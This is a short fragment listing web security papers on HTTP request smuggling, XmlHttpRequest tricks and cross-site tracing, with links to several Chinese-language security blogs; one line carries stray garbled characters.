"HTTP Request Smuggling" (Chaim Linhart, Amit Klein, Ronen Heled and Steve Orrin, June 2005)
Other XmlHttpRequest tricks (Amit Klein, January 2003)
"Cross Site Tracing" (Jeremiah Grossman, January 2003)
http://armorize-cht.blogspot.com 阿碼科技非官方中文 Blog
/ h2 D: a4 t  j" n2 H7 u1 B空虚浪子心BLOG http://www.inbreak.net
Xeye Team http://xeye.us/